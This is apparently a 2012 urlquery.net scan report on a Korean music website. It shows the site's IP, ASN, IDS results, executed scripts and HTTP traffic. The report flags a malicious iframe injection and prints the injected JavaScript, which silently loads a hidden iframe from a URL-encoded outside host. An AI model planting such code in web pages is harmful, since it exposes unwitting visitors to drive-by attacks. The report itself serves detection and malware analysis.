urlquery.net - Free url scanner

Overview

URL	http://promusic.com.ne.kr/
IP	211.119.245.166
ASN	AS3786 LG DACOM Corporation
Location	Korea, Republic of
Report completed	2012-11-14 04:48:46 CET
Status	Loading report..
urlQuery Alerts	Detected malicious iframe injection

Settings

UserAgent	Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Referer
Adobe Reader	8.0
Java	1.6.0_26

Intrusion Detection Systems

Suricata /w Emerging Threats Pro	No alerts detected
Snort /w Sourcefire VRT	No alerts detected

Recent reports on same IP/ASN/Domain

Last 2 reports on IP: 211.119.245.166

Date	Alerts / IDS	URL	IP
2012-11-21 16:12:40	1 / 4	http://chanjuri.com.ne.kr/2007050305/089.htm	211.119.245.166
2012-11-21 05:52:31	1 / 4	http://chanjuri.com.ne.kr/2007050305/089.htm	211.119.245.166

Last 6 reports on ASN: AS3786 LG DACOM Corporation

Date	Alerts / IDS	URL	IP
2013-04-08 10:39:59	0 / 0	http://free-onlinednsmy.com	220.149.236.151
2013-04-08 09:21:55	0 / 2	http://shockit.woto.net/holyview/install_holyview4.exe	114.108.131.23
2013-04-08 04:36:37	0 / 6	http://www.cheonanhotel.com/eng/free_bd/b_view.asp?b_type=d&b_idx=570	211.174.62.127
2013-04-08 03:32:50	0 / 3	http://www.seobongsa.com/bbs/zboard.php?id=bang	180.150.228.152
2013-04-08 03:25:31	0 / 3	http://down.windviewer.com/setup_pid008_silent.exe	114.108.128.19
2013-04-08 03:23:02	0 / 4	http://www.seobongsa.com/bbs/zboard.php?id=bang&page=18&select_arrange=headnum&desc (...)	180.150.228.152

JavaScript

Executed Scripts (11)

Executed Evals (3)

#1 JavaScript::Eval (size: 799, repeated: 1) - Alert detect on script (Severity: 2)

		if (document.getElementsByTagName('body')[0]) {
		    iframer();
		} else {
		    document.write("<iframe src='http://%71%65%72%66%68%67%6B%61%64%68%73%66%75%6B%68%65%72%74%67%72%70%6F%74%67%6A%70%6F%69%64%66%67%2E%63%65%2E%6D%73/main.php?page=b5a87c34230be775' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
		}
		function iframer() {
		    var f = document.createElement('iframe');
		    f.setAttribute('src', 'http://%71%65%72%66%68%67%6B%61%64%68%73%66%75%6B%68%65%72%74%67%72%70%6F%74%67%6A%70%6F%69%64%66%67%2E%63%65%2E%6D%73/main.php?page=b5a87c34230be775');
		    f.style.visibility = 'hidden';
		    f.style.position = 'absolute';
		    f.style.left = '0';
		    f.style.top = '0';
		    f.setAttribute('width', '10');
		    f.setAttribute('height', '10');
		    document.getElementsByTagName('body')[0].appendChild(f);
		}

#2 JavaScript::Eval (size: 5, repeated: 1)

asdas

#3 JavaScript::Eval (size: 4, repeated: 799)

n[i]

Executed Writes (6)

#1 JavaScript::Write (size: 82, repeated: 1)

  _dwiPID="+inside_statics+";  if(typeof(_dwiCatch) == "function") { _dwiCatch();}

#2 JavaScript::Write (size: 305, repeated: 1)

 <script>var Long_URL=document.domain; TMPdomain=Long_URL.split(".");if (TMPdomain.length==4) { ID = TMPdomain[0]; } else { ID = TMPdomain[TMPdomain.length - 4]; } document.writeln('<img src=http://statics.com.ne.kr/statics/visitcount.php3?ID='+ID+' boder=1 width=1 height=1 style=display:none>')</script>

#3 JavaScript::Write (size: 10, repeated: 2)

</script>

#4 JavaScript::Write (size: 114, repeated: 1)

<img src=http://statics.com.ne.kr/statics/visitcount.php3?ID=promusic boder=1 width=1 height=1 style=display:none>

#5 JavaScript::Write (size: 100, repeated: 1)

<script type="text/javascript" charset="euc-kr" src="http://log.inside.daum.net/dwi_log/js/dwi.js">

#6 JavaScript::Write (size: 9, repeated: 1)

<script>

HTTP Transactions (5)

Request	Response
GET / HTTP/1.1 Host: promusic.com.ne.kr User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive	HTTP/1.1 200 OK Content-Type: text/html Date: Wed, 14 Nov 2012 03:48:08 GMT Server: Apache/1.3.33 (Unix) Cache-Control: post-check=1, pre-check=60 Set-Cookie: AccessLink=pass; path=/; Keep-Alive: timeout=15, max=1000 Connection: Keep-Alive Transfer-Encoding: chunked
GET /toolbar/statics/ HTTP/1.1 Host: icons.com.ne.kr User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: / Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://promusic.com.ne.kr/	HTTP/1.1 200 OK Content-Type: text/html Date: Wed, 14 Nov 2012 03:48:13 GMT Server: Apache/1.3.36 (Unix) PHP/4.4.2 Last-Modified: Tue, 06 Jan 2009 01:06:10 GMT Etag: "1ca805f-9c8-4962ae82" Accept-Ranges: bytes Content-Length: 2504 Connection: close
GET /favicon.ico HTTP/1.1 Host: promusic.com.ne.kr User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Cookie: AccessLink=pass	HTTP/1.1 404 Not Found Content-Type: text/html; charset=iso-8859-1 Date: Wed, 14 Nov 2012 03:48:17 GMT Server: Apache/1.3.33 (Unix) Keep-Alive: timeout=15, max=998 Connection: Keep-Alive Transfer-Encoding: chunked
GET /favicon.ico HTTP/1.1 Host: promusic.com.ne.kr User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Cookie: AccessLink=pass	HTTP/1.1 404 Not Found Content-Type: text/html; charset=iso-8859-1 Date: Wed, 14 Nov 2012 03:48:20 GMT Server: Apache/1.3.33 (Unix) Keep-Alive: timeout=15, max=997 Connection: Keep-Alive Transfer-Encoding: chunked
GET /dwi_log/js/dwi.js HTTP/1.1 Host: log.inside.daum.net User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: / Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://promusic.com.ne.kr/